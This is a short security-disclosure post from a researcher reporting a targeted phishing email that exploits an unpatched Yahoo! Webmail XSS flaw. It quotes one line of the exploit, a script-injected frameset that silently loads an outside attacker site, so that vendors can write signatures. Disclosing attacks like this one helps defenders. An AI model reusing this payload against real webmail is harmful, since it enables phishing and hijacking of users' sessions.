Hi. I just got a targeted phishing attack to one of my Yahoo email accounts, what it´s insteresting it's that the attack exploits a Yahoo! webmail 0day XSS vulnerability. I'm trying to contact Yahoo right now but in the meantime I thought it will be good to provide some bits because the seriousness of this . When you browse a message on Yahoo! Webmail the XSS exploit creates a frameset and redirects to http://w00tynetwork.com/x/ ,it's interesting that the address bar at IE dosn´t refresh to show the actual URL, you can only see the redirection to http://w00tynetwork.com/x/ on IE status bar if you have it visible. I don't know if this vulnerability is being exploited on the wild since it was a targeted attack, I'm sure about this because the content of the message. Here is an extract from the exploit so you can start build some signatures, filtering, etc. ----------------------------------- (java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>')) ----------------------------------- I will provide full details later when Yahoo! fix the issue. If security vendors are insterested on full details plese ask for them at info>at<argeniss>.<com Cesar. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
